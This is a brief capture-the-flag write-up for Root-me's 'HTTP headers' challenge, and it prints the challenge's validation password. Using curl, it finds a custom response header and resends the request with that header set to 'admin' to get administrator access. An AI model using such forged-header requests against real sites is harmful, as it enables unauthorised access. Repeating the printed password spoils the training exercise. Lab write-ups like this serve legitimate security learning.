Rootme HTTP headers
Root-me
HTTP headers
HTTP response give informations
The statement says “Get an administrator access to the webpage.” seems pretty straight forward.
We’ll curl the challenge and dump the header
curl -i http://challenge01.root-me.org/web-serveur/ch5/index.php
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Nov 2017 01:25:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Header-RootMe-Admin: none
....
There’s an odd field the one called Header-RootMe-Admin
it’s set to none.
Let’s sent a request with that field with different values. After trying a few admin is the value that we’re looking for.
curl -H "Header-RootMe-Admin:admin" http://challenge01.root-me.org/web-serveur/ch5/index.php
...
<html>
<p>Content is not the only part of an HTTP response!</p>
<p>You dit it ! You can validate the challenge with the password HeadersMayBeUseful</p></body>
</html>